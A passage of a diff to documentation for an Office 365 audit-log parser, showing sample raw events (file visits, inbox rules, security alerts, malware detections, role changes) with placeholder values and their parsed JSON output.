rentre!.png\",\"ClientIP\":\"2503:1026:c0a:70::5\",\"UserId\":\"Frodon.Saquet@comte.com\",\"ActorYammerUserId\":1315924230144,\"ActorUserId\":\"Frodon.Saquet@comte.com\",\"YammerNetworkId\":6358000,\"Version\":1,\"FileId\":1439262310400,\"FileName\":\"Pix_C'est la rentre!.png\",\"VersionId\":1460243079168}", + "message": "{\"Id\": \"40094389-7baf-a3ba-5acc-2773c002cfbe\", \"RecordType\": 22, \"CreationTime\": \"2022-09-07T12:22:07\", \"Operation\": \"FileVisited\", \"OrganizationId\": \"12b674a1-3497-4997-b4ab-2a40bf0e5139\", \"UserType\": 0, \"UserKey\": \"10032001cf3045ad\", \"Workload\": \"Yammer\", \"ResultStatus\": \"TRUE\", \"ObjectId\": \"Pix_C'est la rentre!.png\", \"ClientIP\": \"2503:1026:c0a:70::5\", \"UserId\": \"Frodon.Saquet@comte.com\", \"ActorYammerUserId\": 1315924230144, \"ActorUserId\": \"Frodon.Saquet@comte.com\", \"YammerNetworkId\": 6358000, \"Version\": 1, \"FileId\": 1439262310400, \"FileName\": \"Pix_C'est la rentre!.png\", \"VersionId\": 1460243079168}", "event": { "action": "FileVisited", "category": [ @@ -1444,7 +1604,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2023-12-13T10:08:21\",\"Id\":\"xxxxxxxxx\",\"Operation\":\"EditForm\",\"OrganizationId\":\"xxxxxxxxx\",\"RecordType\":66,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxxxxxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftForms\",\"ClientIP\":\"0.0.0.0\",\"ObjectId\":\"xxxxxxx\",\"UserId\":\"user@test.io\",\"ActivityParameters\":\"{\\\"EditOperation\\\":\\\"QuestionUpdated\\\"}\",\"FormId\":\"xxxxxxx\",\"FormName\":\"FormNameValue\\n\\n\",\"FormType\":1,\"FormsUserType\":1,\"SourceApp\":\"ms-formweb\"}", + "message": "{\"CreationTime\": \"2023-12-13T10:08:21\", \"Id\": \"xxxxxxxxx\", \"Operation\": \"EditForm\", \"OrganizationId\": \"xxxxxxxxx\", \"RecordType\": 66, \"ResultStatus\": \"Succeeded\", \"UserKey\": \"xxxxxxxxx\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftForms\", \"ClientIP\": \"0.0.0.0\", \"ObjectId\": \"xxxxxxx\", \"UserId\": \"user@test.io\", \"ActivityParameters\": \"{\\\"EditOperation\\\":\\\"QuestionUpdated\\\"}\", \"FormId\": \"xxxxxxx\", \"FormName\": \"FormNameValue\\n\\n\", \"FormType\": 1, \"FormsUserType\": 1, \"SourceApp\": \"ms-formweb\"}", "event": { "action": "EditForm", "code": "66", @@ -1505,7 +1665,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2023-05-24T15:10:53\",\"Id\":\"9cf2a1f7-90bc-494b-2784-08db5c691133\",\"Operation\":\"New-InboxRule\",\"OrganizationId\":\"49c2f50d-d36c-4b88-8511-55ce3ea9e53f\",\"RecordType\":1,\"ResultStatus\":\"True\",\"UserKey\":\"100320028D9C5197\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"240.157.135.119:63070\",\"ObjectId\":\"EURPR07A010.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/example.onmicrosoft.com/bc1b1df3-f861-4aec-bf7c-40ce5b5566c1\\\\RULE_NAME\",\"UserId\":\"RobertP@example.onmicrosoft.com\",\"AppId\":\"00000002-0000-0ff1-ce00-000000000000\",\"ClientAppId\":\"\",\"ExternalAccess\":false,\"OrganizationName\":\"example.onmicrosoft.com\",\"OriginatingServer\":\"AM0PR07MB5763 (15.20.6411.029)\",\"Parameters\":[{\"Name\":\"ForwardTo\",\"Value\":\"bob@example.org\"},{\"Name\":\"Force\",\"Value\":\"False\"},{\"Name\":\"AlwaysDeleteOutlookRulesBlob\",\"Value\":\"False\"},{\"Name\":\"RedirectTo\",\"Value\":\"joe@example.org\"},{\"Name\":\"From\",\"Value\":\"alice@example.org\"},{\"Name\":\"Name\",\"Value\":\"RULE_NAME\"},{\"Name\":\"DeleteMessage\",\"Value\":\"True\"},{\"Name\":\"FromAddressContainsWords\",\"Value\":\"@example.org\"},{\"Name\":\"MarkAsRead\",\"Value\":\"True\"},{\"Name\":\"StopProcessingRules\",\"Value\":\"True\"},{\"Name\":\"SubjectOrBodyContainsWords\",\"Value\":\"keyword\"},{\"Name\":\"MoveToFolder\",\"Value\":\"Historique des conversations\"}],\"SessionId\":\"984c0958-0631-4b90-b116-15094fc36847\"}\r\n\r", + "message": "{\"CreationTime\": \"2023-05-24T15:10:53\", \"Id\": \"9cf2a1f7-90bc-494b-2784-08db5c691133\", \"Operation\": \"New-InboxRule\", \"OrganizationId\": \"49c2f50d-d36c-4b88-8511-55ce3ea9e53f\", \"RecordType\": 1, \"ResultStatus\": \"True\", \"UserKey\": \"100320028D9C5197\", \"UserType\": 2, \"Version\": 1, \"Workload\": \"Exchange\", \"ClientIP\": \"240.157.135.119:63070\", \"ObjectId\": \"EURPR07A010.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/example.onmicrosoft.com/bc1b1df3-f861-4aec-bf7c-40ce5b5566c1\\\\RULE_NAME\", \"UserId\": \"RobertP@example.onmicrosoft.com\", \"AppId\": \"00000002-0000-0ff1-ce00-000000000000\", \"ClientAppId\": \"\", \"ExternalAccess\": false, \"OrganizationName\": \"example.onmicrosoft.com\", \"OriginatingServer\": \"AM0PR07MB5763 (15.20.6411.029)\", \"Parameters\": [{\"Name\": \"ForwardTo\", \"Value\": \"bob@example.org\"}, {\"Name\": \"Force\", \"Value\": \"False\"}, {\"Name\": \"AlwaysDeleteOutlookRulesBlob\", \"Value\": \"False\"}, {\"Name\": \"RedirectTo\", \"Value\": \"joe@example.org\"}, {\"Name\": \"From\", \"Value\": \"alice@example.org\"}, {\"Name\": \"Name\", \"Value\": \"RULE_NAME\"}, {\"Name\": \"DeleteMessage\", \"Value\": \"True\"}, {\"Name\": \"FromAddressContainsWords\", \"Value\": \"@example.org\"}, {\"Name\": \"MarkAsRead\", \"Value\": \"True\"}, {\"Name\": \"StopProcessingRules\", \"Value\": \"True\"}, {\"Name\": \"SubjectOrBodyContainsWords\", \"Value\": \"keyword\"}, {\"Name\": \"MoveToFolder\", \"Value\": \"Historique des conversations\"}], \"SessionId\": \"984c0958-0631-4b90-b116-15094fc36847\"}", "event": { "action": "New-InboxRule", "code": "1", @@ -1665,7 +1825,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2024-02-22T09:56:48\",\"Id\":\"0e042318-7c78-4acb-ae00-5ee74465bca3\",\"Operation\":\"AlertUpdated\",\"OrganizationId\":\"2d7585dc-97bc-4494-b98c-79f2a4946931\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\",\"ObjectId\":\"c299a0a0-14da-428a-b08d-481d562298cb\",\"UserId\":\"SecurityComplianceAlerts\",\"AlertId\":\"c299a0a0-14da-428a-b08d-481d562298cb\",\"AlertLinks\":[{\"AlertLinkHref\":\"\"}],\"AlertType\":\"Custom\",\"Category\":\"ThreatManagement\",\"Comments\":\"New alert\",\"Data\":\"{\\\"ts\\\":\\\"2024-02-22 09:46:54Z\\\",\\\"te\\\":\\\"2024-02-22 09:46:54Z\\\",\\\"an\\\":\\\"Mass download by a single user\\\",\\\"ad\\\":\\\"Activity policy 'Mass download by a single user' was triggered by 'Anakin SKYWALKER'\\\",\\\"f3u\\\":\\\"anakin.skywalker@gondor.com\\\",\\\"alk\\\":\\\"https://gondor.portal.cloudappsecurity.com/#/alerts/79d71811t27fe160149dcd56\\\",\\\"plk\\\":\\\"https://gondor.portal.cloudappsecurity.com/#/policy/?id=eq(5f391720dd4e64e3db757c35,)\\\",\\\"mat\\\":\\\"MCAS_ALERT_CABINET_EVENT_MATCH_AUDIT\\\"}\",\"Name\":\"Mass download by a single user\",\"PolicyId\":\"8697dfdc-965d-67f7-bb37-b2551b296c04\",\"Severity\":\"High\",\"Source\":\"Cloud App Security\",\"Status\":\"Active\"}", + "message": "{\"CreationTime\": \"2024-02-22T09:56:48\", \"Id\": \"0e042318-7c78-4acb-ae00-5ee74465bca3\", \"Operation\": \"AlertUpdated\", \"OrganizationId\": \"2d7585dc-97bc-4494-b98c-79f2a4946931\", \"RecordType\": 40, \"ResultStatus\": \"Succeeded\", \"UserKey\": \"SecurityComplianceAlerts\", \"UserType\": 4, \"Version\": 1, \"Workload\": \"SecurityComplianceCenter\", \"ObjectId\": \"c299a0a0-14da-428a-b08d-481d562298cb\", \"UserId\": \"SecurityComplianceAlerts\", \"AlertId\": \"c299a0a0-14da-428a-b08d-481d562298cb\", \"AlertLinks\": [{\"AlertLinkHref\": \"\"}], \"AlertType\": \"Custom\", \"Category\": \"ThreatManagement\", \"Comments\": \"New alert\", \"Data\": \"{\\\"ts\\\":\\\"2024-02-22 09:46:54Z\\\",\\\"te\\\":\\\"2024-02-22 09:46:54Z\\\",\\\"an\\\":\\\"Mass download by a single user\\\",\\\"ad\\\":\\\"Activity policy 'Mass download by a single user' was triggered by 'Anakin SKYWALKER'\\\",\\\"f3u\\\":\\\"anakin.skywalker@gondor.com\\\",\\\"alk\\\":\\\"https://gondor.portal.cloudappsecurity.com/#/alerts/79d71811t27fe160149dcd56\\\",\\\"plk\\\":\\\"https://gondor.portal.cloudappsecurity.com/#/policy/?id=eq(5f391720dd4e64e3db757c35,)\\\",\\\"mat\\\":\\\"MCAS_ALERT_CABINET_EVENT_MATCH_AUDIT\\\"}\", \"Name\": \"Mass download by a single user\", \"PolicyId\": \"8697dfdc-965d-67f7-bb37-b2551b296c04\", \"Severity\": \"High\", \"Source\": \"Cloud App Security\", \"Status\": \"Active\"}", "event": { "action": "AlertUpdated", "category": [ @@ -1689,6 +1849,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "alert": { "category": "ThreatManagement", "display_name": "Mass download by a single user", + "id": "c299a0a0-14da-428a-b08d-481d562298cb", "severity": "High", "source": "Cloud App Security", "status": "Active" @@ -1708,7 +1869,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "user": [ - "SecurityComplianceAlerts" + "anakin.skywalker" ] }, "rule": { @@ -1723,8 +1884,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "user": { + "domain": "gondor.com", + "email": "anakin.skywalker@gondor.com", "id": "SecurityComplianceAlerts", - "name": "SecurityComplianceAlerts" + "name": "anakin.skywalker" } } @@ -1803,7 +1966,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2022-07-07T22:38:49\",\"Id\":\"266f5962-ffad-4fce-a101-3197581af3d4\",\"Operation\":\"AtpDetection\",\"OrganizationId\":\"7f7e5b97-b780-473c-9c76-9182a9d7f2b4\",\"RecordType\":47,\"UserKey\":\"ThreatIntel\",\"UserType\":4,\"Version\":1,\"Workload\":\"ThreatIntelligence\",\"UserId\":\"people@example.org\",\"DetectionDate\":\"2022-07-07T22:38:11\",\"DetectionMethod\":\"AntiMalware\",\"EventDeepLink\":\"https://protection.office.com/threatexplorer?dltarget=Explorer&dlstorage=Url&viewid=MalwareContent&query-Id=2ab4791e-fdd4-42f9-ad3c-c54ef7a4d548\",\"FileData\":{\"DocumentId\":\"03254108-f682-417d-f3e6-08da605bf091\",\"FileName\":\"malware\",\"FilePath\":\"https://example.sharepoint.com/personal/people_example_org/Documents/malware\",\"FileSize\":\"12345\",\"FileVerdict\":1,\"MalwareFamily\":\"iPhoneOS/Vortex.C\",\"SHA256\":\"SnltYq0lbVwFlAIf+lQugPXaMcDNV9t9pN/Zkhx7hQ8=\"},\"LastModifiedBy\":\"people@example.org\",\"LastModifiedDate\":\"2022-01-01T13:00:53\",\"SourceWorkload\":1}\n", + "message": "{\"CreationTime\": \"2022-07-07T22:38:49\", \"Id\": \"266f5962-ffad-4fce-a101-3197581af3d4\", \"Operation\": \"AtpDetection\", \"OrganizationId\": \"7f7e5b97-b780-473c-9c76-9182a9d7f2b4\", \"RecordType\": 47, \"UserKey\": \"ThreatIntel\", \"UserType\": 4, \"Version\": 1, \"Workload\": \"ThreatIntelligence\", \"UserId\": \"people@example.org\", \"DetectionDate\": \"2022-07-07T22:38:11\", \"DetectionMethod\": \"AntiMalware\", \"EventDeepLink\": \"https://protection.office.com/threatexplorer?dltarget=Explorer&dlstorage=Url&viewid=MalwareContent&query-Id=2ab4791e-fdd4-42f9-ad3c-c54ef7a4d548\", \"FileData\": {\"DocumentId\": \"03254108-f682-417d-f3e6-08da605bf091\", \"FileName\": \"malware\", \"FilePath\": \"https://example.sharepoint.com/personal/people_example_org/Documents/malware\", \"FileSize\": \"12345\", \"FileVerdict\": 1, \"MalwareFamily\": \"iPhoneOS/Vortex.C\", \"SHA256\": \"SnltYq0lbVwFlAIf+lQugPXaMcDNV9t9pN/Zkhx7hQ8=\"}, \"LastModifiedBy\": \"people@example.org\", \"LastModifiedDate\": \"2022-01-01T13:00:53\", \"SourceWorkload\": 1}", "event": { "action": "AtpDetection", "code": "47", @@ -1875,7 +2038,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2022-07-08T09:10:19\",\"Id\":\"50906475-74dd-4447-ae4d-595d225d0055\",\"Operation\":\"TIMailData\",\"OrganizationId\":\"8a457951-a594-4607-a5dc-dfc72338eb13\",\"RecordType\":28,\"UserKey\":\"ThreatIntel\",\"UserType\":4,\"Version\":1,\"Workload\":\"ThreatIntelligence\",\"ObjectId\":\"4ca2df96-4488-4f3b-a265-b4edaa3c4d8f\",\"UserId\":\"ThreatIntel\",\"AdditionalActionsAndResults\":[\"OriginalDelivery: [N/A]\"],\"AttachmentData\":[{\"FileName\":\"malicious.pdf.exe\",\"FileType\":\"exe;zip\",\"FileVerdict\":1,\"MalwareFamily\":\"Trojan_Gen_FileWithSpoofedExtension_A\",\"SHA256\":\"E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855\"}],\"AuthDetails\":[{\"Name\":\"SPF\",\"Value\":\"Pass\"},{\"Name\":\"DKIM\",\"Value\":\"Fail\"},{\"Name\":\"DMARC\",\"Value\":\"Best guess pass\"},{\"Name\":\"Comp Auth\",\"Value\":\"pass\"}],\"DeliveryAction\":\"Blocked\",\"DetectionMethod\":\"File detonation\",\"DetectionType\":\"Inline\",\"Directionality\":\"Inbound\",\"EventDeepLink\":\"https://protection.office.com/?hash=/threatexplorer?messageParams=a4dbf74a-89e0-40de-b14d-df573f48aa45,a4dbf74a-89e0-40de-b14d-df573f48aa45-0000000000000000000-1,2022-07-08T00:00:00,2022-07-08T23:59:59&view=Malware\",\"InternetMessageId\":\"<4cc4a74e-a195-4222-abd7-a8adf2cd347d@sender.com>\",\"LatestDeliveryLocation\":\"Quarantine\",\"MessageTime\":\"2022-07-08T09:07:47\",\"NetworkMessageId\":\"7250ff78-fd13-45a2-bb5d-23a5d59c2699\",\"OriginalDeliveryLocation\":\"Quarantine\",\"P1Sender\":\"prvs=0000000000=human@sender.com\",\"P2Sender\":\"human@sender.com\",\"Policy\":\"SafeAttachements\",\"PolicyAction\":\"Quarantine\",\"Recipients\":[\"human@example.com\"],\"SenderIp\":\"1.2.3.4\",\"Subject\":\"Refund to you\",\"SystemOverrides\":[{\"Details\":\"Antimalware policy block by file type\",\"FinalOverride\":\"No\",\"Result\":\"Block\",\"Source\":\"Tenant\"}],\"ThreatsAndDetectionTech\":[\"Malware: [File detonation]\",\"Spam: [General filter]\"],\"Verdict\":\"Malware\"}\n", + "message": "{\"CreationTime\": \"2022-07-08T09:10:19\", \"Id\": \"50906475-74dd-4447-ae4d-595d225d0055\", \"Operation\": \"TIMailData\", \"OrganizationId\": \"8a457951-a594-4607-a5dc-dfc72338eb13\", \"RecordType\": 28, \"UserKey\": \"ThreatIntel\", \"UserType\": 4, \"Version\": 1, \"Workload\": \"ThreatIntelligence\", \"ObjectId\": \"4ca2df96-4488-4f3b-a265-b4edaa3c4d8f\", \"UserId\": \"ThreatIntel\", \"AdditionalActionsAndResults\": [\"OriginalDelivery: [N/A]\"], \"AttachmentData\": [{\"FileName\": \"malicious.pdf.exe\", \"FileType\": \"exe;zip\", \"FileVerdict\": 1, \"MalwareFamily\": \"Trojan_Gen_FileWithSpoofedExtension_A\", \"SHA256\": \"E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855\"}], \"AuthDetails\": [{\"Name\": \"SPF\", \"Value\": \"Pass\"}, {\"Name\": \"DKIM\", \"Value\": \"Fail\"}, {\"Name\": \"DMARC\", \"Value\": \"Best guess pass\"}, {\"Name\": \"Comp Auth\", \"Value\": \"pass\"}], \"DeliveryAction\": \"Blocked\", \"DetectionMethod\": \"File detonation\", \"DetectionType\": \"Inline\", \"Directionality\": \"Inbound\", \"EventDeepLink\": \"https://protection.office.com/?hash=/threatexplorer?messageParams=a4dbf74a-89e0-40de-b14d-df573f48aa45,a4dbf74a-89e0-40de-b14d-df573f48aa45-0000000000000000000-1,2022-07-08T00:00:00,2022-07-08T23:59:59&view=Malware\", \"InternetMessageId\": \"<4cc4a74e-a195-4222-abd7-a8adf2cd347d@sender.com>\", \"LatestDeliveryLocation\": \"Quarantine\", \"MessageTime\": \"2022-07-08T09:07:47\", \"NetworkMessageId\": \"7250ff78-fd13-45a2-bb5d-23a5d59c2699\", \"OriginalDeliveryLocation\": \"Quarantine\", \"P1Sender\": \"prvs=0000000000=human@sender.com\", \"P2Sender\": \"human@sender.com\", \"Policy\": \"SafeAttachements\", \"PolicyAction\": \"Quarantine\", \"Recipients\": [\"human@example.com\"], \"SenderIp\": \"1.2.3.4\", \"Subject\": \"Refund to you\", \"SystemOverrides\": [{\"Details\": \"Antimalware policy block by file type\", \"FinalOverride\": \"No\", \"Result\": \"Block\", \"Source\": \"Tenant\"}], \"ThreatsAndDetectionTech\": [\"Malware: [File detonation]\", \"Spam: [General filter]\"], \"Verdict\": \"Malware\"}", "event": { "action": "Blocked", "code": "28", @@ -2021,7 +2184,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2022-07-07T10:10:52\",\"Id\":\"47bf7844-15bf-4cf2-91a3-15b32ceb89b5\",\"Operation\":\"TIUrlClickData\",\"OrganizationId\":\"0eaa2260-b241-410b-bcae-e38c8b68787f\",\"RecordType\":41,\"UserKey\":\"ThreatIntel\",\"UserType\":4,\"Version\":1,\"Workload\":\"ThreatIntelligence\",\"UserId\":\"human@example.org\",\"AppName\":\"Mail\",\"AppVersion\":\"0.0.0000\",\"EventDeepLink\":\"https://protection.office.com/threatexplorer?dltarget=Explorer&dlstorage=Url&viewid=Phish&query-Recipients=people@xample.org&query-NetworkMessageId=53b5da37-1893-4e78-a89f-a4d26b53184c\",\"SourceId\":\"8a8634d0-d803-4bc9-b221-2863bff6a001\",\"TimeOfClick\":\"2022-07-07T09:33:33\",\"Url\":\"https://malicious.domain.com\",\"UserIp\":\"1.2.3.4\"}\n", + "message": "{\"CreationTime\": \"2022-07-07T10:10:52\", \"Id\": \"47bf7844-15bf-4cf2-91a3-15b32ceb89b5\", \"Operation\": \"TIUrlClickData\", \"OrganizationId\": \"0eaa2260-b241-410b-bcae-e38c8b68787f\", \"RecordType\": 41, \"UserKey\": \"ThreatIntel\", \"UserType\": 4, \"Version\": 1, \"Workload\": \"ThreatIntelligence\", \"UserId\": \"human@example.org\", \"AppName\": \"Mail\", \"AppVersion\": \"0.0.0000\", \"EventDeepLink\": \"https://protection.office.com/threatexplorer?dltarget=Explorer&dlstorage=Url&viewid=Phish&query-Recipients=people@xample.org&query-NetworkMessageId=53b5da37-1893-4e78-a89f-a4d26b53184c\", \"SourceId\": \"8a8634d0-d803-4bc9-b221-2863bff6a001\", \"TimeOfClick\": \"2022-07-07T09:33:33\", \"Url\": \"https://malicious.domain.com\", \"UserIp\": \"1.2.3.4\"}", "event": { "action": "TIUrlClickData", "code": "41", @@ -2068,7 +2231,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"Id\":\"bb6e6d49\",\"RecordType\":20,\"CreationTime\":\"2023-08-22T13:51:33\",\"Operation\":\"ViewReport\",\"OrganizationId\":\"12b674a1\",\"UserType\":0,\"UserKey\":\"1003200\",\"Workload\":\"PowerBI\",\"UserId\":\"joe.doe@user.fr\",\"ClientIP\":\"1.2.3.4\",\"UserAgent\":\"Mozilla/5.0\",\"Activity\":\"ViewReport\",\"ItemName\":\"Tdb_TI\",\"WorkSpaceName\":\"Tableau de Bord Strat\u00e9gique\",\"DatasetName\":\"Tdb_TI\",\"ReportName\":\"Tdb_TI\",\"CapacityId\":\"5A456BD6\",\"CapacityName\":\"P1_ACOSS\",\"WorkspaceId\":\"08d52dac\",\"AppName\":\"Tableaux de bord de pilotage\",\"ObjectId\":\"Tdb_TI\",\"DatasetId\":\"6f39a3c3\",\"ReportId\":\"213eb6fe\",\"ArtifactId\":\"213eb6fe\",\"ArtifactName\":\"Tdb_TI\",\"IsSuccess\":true,\"ReportType\":\"PowerBIReport\",\"RequestId\":\"94fea00c\",\"ActivityId\":\"147a0db5\",\"AppReportId\":\"fe6a9f80\",\"DistributionMethod\":\"Apps\",\"ConsumptionMethod\":\"Power BI Web\",\"AppId\":\"187ea3f4\",\"ArtifactKind\":\"Report\",\"RefreshEnforcementPolicy\":0}", + "message": "{\"Id\": \"bb6e6d49\", \"RecordType\": 20, \"CreationTime\": \"2023-08-22T13:51:33\", \"Operation\": \"ViewReport\", \"OrganizationId\": \"12b674a1\", \"UserType\": 0, \"UserKey\": \"1003200\", \"Workload\": \"PowerBI\", \"UserId\": \"joe.doe@user.fr\", \"ClientIP\": \"1.2.3.4\", \"UserAgent\": \"Mozilla/5.0\", \"Activity\": \"ViewReport\", \"ItemName\": \"Tdb_TI\", \"WorkSpaceName\": \"Tableau de Bord Strat\\u00e9gique\", \"DatasetName\": \"Tdb_TI\", \"ReportName\": \"Tdb_TI\", \"CapacityId\": \"5A456BD6\", \"CapacityName\": \"P1_ACOSS\", \"WorkspaceId\": \"08d52dac\", \"AppName\": \"Tableaux de bord de pilotage\", \"ObjectId\": \"Tdb_TI\", \"DatasetId\": \"6f39a3c3\", \"ReportId\": \"213eb6fe\", \"ArtifactId\": \"213eb6fe\", \"ArtifactName\": \"Tdb_TI\", \"IsSuccess\": true, \"ReportType\": \"PowerBIReport\", \"RequestId\": \"94fea00c\", \"ActivityId\": \"147a0db5\", \"AppReportId\": \"fe6a9f80\", \"DistributionMethod\": \"Apps\", \"ConsumptionMethod\": \"Power BI Web\", \"AppId\": \"187ea3f4\", \"ArtifactKind\": \"Report\", \"RefreshEnforcementPolicy\": 0}", "event": { "action": "ViewReport", "code": "20", @@ -2129,6 +2292,89 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "remove_member_from_role.json" + + ```json + + { + "message": "{\"CreationTime\": \"2024-07-10T14:31:24\", \"Id\": \"d1253377-388e-4ca1-a163-32dccb867ddd\", \"Operation\": \"Remove member from role.\", \"OrganizationId\": \"a6f8d8c5-e3ee-471b-a1e4-abdf3ccd6c55\", \"RecordType\": 8, \"ResultStatus\": \"Success\", \"UserKey\": \"key@example.com\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"AzureActiveDirectory\", \"ObjectId\": \"john.doe@example.com\", \"UserId\": \"admin@example.com\", \"AzureActiveDirectoryEventType\": 1, \"ExtendedProperties\": [{\"Name\": \"additionalDetails\", \"Value\": \"{}\"}, {\"Name\": \"extendedAuditEventCategory\", \"Value\": \"Role\"}], \"ModifiedProperties\": [{\"Name\": \"Role.ObjectID\", \"NewValue\": \"\", \"OldValue\": \"62d603c4-9712-4ea9-83c6-1e253fad40a4\"}, {\"Name\": \"Role.DisplayName\", \"NewValue\": \"\", \"OldValue\": \"Global Administrator\"}, {\"Name\": \"Role.TemplateId\", \"NewValue\": \"\", \"OldValue\": \"2eb5763a-6258-4084-90d6-8f149a03132d\"}, {\"Name\": \"Role.WellKnownObjectName\", \"NewValue\": \"\", \"OldValue\": \"TenantAdmins\"}], \"Actor\": [{\"ID\": \"admin@example.com\", \"Type\": 5}, {\"ID\": \"100320029D963D0D\", \"Type\": 3}, {\"ID\": \"User_47498f0f-242d-4ec8-8c13-9c861ce5669f\", \"Type\": 2}, {\"ID\": \"47498f0f-242d-4ec8-8c13-9c861ce5669f\", \"Type\": 2}, {\"ID\": \"User\", \"Type\": 2}], \"ActorContextId\": \"a6f8d8c5-e3ee-471b-a1e4-abdf3ccd6c55\", \"InterSystemsId\": \"3da056e9-e6dc-4157-b991-8304c3b95eb7\", \"IntraSystemId\": \"e7bf6e46-a61f-417a-a11d-282756b8262f\", \"SupportTicketId\": \"\", \"Target\": [{\"ID\": \"User_1514c9ec-882d-4beb-99a9-301209f6a05a\", \"Type\": 2}, {\"ID\": \"1514c9ec-882d-4beb-99a9-301209f6a05a\", \"Type\": 2}, {\"ID\": \"User\", \"Type\": 2}, {\"ID\": \"john.doe@example.com\", \"Type\": 5}, {\"ID\": \"100320029D9D1C86\", \"Type\": 3}], \"TargetContextId\": \"a6f8d8c5-e3ee-471b-a1e4-abdf3ccd6c55\"}", + "event": { + "action": "Remove member from role.", + "category": [ + "iam" + ], + "code": "8", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-10T14:31:24Z", + "action": { + "id": 8, + "name": "Remove member from role.", + "outcome": "success", + "target": "user" + }, + "office365": { + "audit": { + "object_id": "john.doe@example.com" + }, + "context": { + "correlation": { + "id": "3da056e9-e6dc-4157-b991-8304c3b95eb7" + }, + "modified_properties": [ + { + "Name": "Role.ObjectID", + "NewValue": "", + "OldValue": "62d603c4-9712-4ea9-83c6-1e253fad40a4" + }, + { + "Name": "Role.DisplayName", + "NewValue": "", + "OldValue": "Global Administrator" + }, + { + "Name": "Role.TemplateId", + "NewValue": "", + "OldValue": "2eb5763a-6258-4084-90d6-8f149a03132d" + }, + { + "Name": "Role.WellKnownObjectName", + "NewValue": "", + "OldValue": "TenantAdmins" + } + ] + }, + "record_type": 8, + "result_status": "Success", + "user_type": { + "code": 0, + "name": "Regular" + } + }, + "organization": { + "id": "a6f8d8c5-e3ee-471b-a1e4-abdf3ccd6c55" + }, + "related": { + "user": [ + "admin@example.com" + ] + }, + "service": { + "name": "AzureActiveDirectory" + }, + "user": { + "email": "admin@example.com", + "id": "key@example.com", + "name": "admin@example.com" + } + } + + ``` + + === "security_compliance_alert.json" ```json @@ -2158,6 +2404,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "alert": { "category": "ThreatManagement", "display_name": "Phish delivered due to an ETR override", + "id": "77f6d9ce-da8f-46bf-a651-4bec3c189770", "severity": "Informational", "source": "Office 365 Security & Compliance", "status": "Active" @@ -2244,6 +2491,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "category": "DataLossPrevention", "display_name": "description", "entity_type": "DlpRuleMatch", + "id": "cf0708c6-e2c5-4962-ae99-9af4799175f4", "severity": "Low", "source": "Office 365 Security & Compliance", "status": "Active" @@ -2325,6 +2573,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "category": "MailFlow", "display_name": "Phishing detected", "entity_type": "MalwareFamily", + "id": "178fa649-642f-4d41-943c-451e2266f4a7", "severity": "Low", "source": "Office 365 Security & Compliance", "status": "Active" @@ -2405,6 +2654,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "category": "ThreatManagement", "display_name": "Email reported by user as junk", "entity_type": "User", + "id": "be2ee3c6-2b3c-42ae-aefe-69f185114418", "severity": "Low", "source": "Office 365 Security & Compliance", "status": "Active" @@ -2442,46 +2692,113 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "source_log.json" +=== "security_compliance_alert_5.json" ```json { - "message": "{\"AppAccessContext\":{\"AADSessionId\":\"xxxxxx\",\"CorrelationId\":\"xxxxxx\",\"UniqueTokenId\":\"xxxxxx\"},\"CreationTime\":\"2023-12-13T09:43:17\",\"Id\":\"xxxxxx\",\"Operation\":\"AccessRequestCreated\",\"OrganizationId\":\"xxxxxx\",\"RecordType\":14,\"UserKey\":\"i:0h.f|membership|xxxxxx@test.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"SharePoint\",\"ClientIP\":\"0.0.0.0\",\"UserId\":\"user@test.io\",\"AuthenticationType\":\"FormsCookieAuth\",\"BrowserName\":\"Chrome\",\"BrowserVersion\":\"120.0.0.0\",\"CorrelationId\":\"xxxxxx\",\"EventSource\":\"SharePoint\",\"IsManagedDevice\":false,\"ItemType\":\"File\",\"ListId\":\"xxxxx\",\"ListItemUniqueId\":\"xxxxx\",\"Platform\":\"WinDesktop\",\"Site\":\"xxxxxxxxx\",\"UserAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\",\"WebId\":\"xxxxxxxxx\",\"DeviceDisplayName\":\"xxxxxxxxx\",\"EventData\":\"Lecture12/03/2024 09:43:15\",\"SourceFileExtension\":\"xlsx\",\"TargetUserOrGroupType\":\"Member\",\"TargetUserOrGroupName\":\"user@test.io\",\"SiteUrl\":\"https://maindomain.com/subdomain/endvalue\",\"SourceRelativeUrl\":\"Documents partages/xxxxx.xlsx\",\"SourceFileName\":\"xxxxx.xlsx\",\"ObjectId\":\"xxxxx.xlsx\"}", + "message": 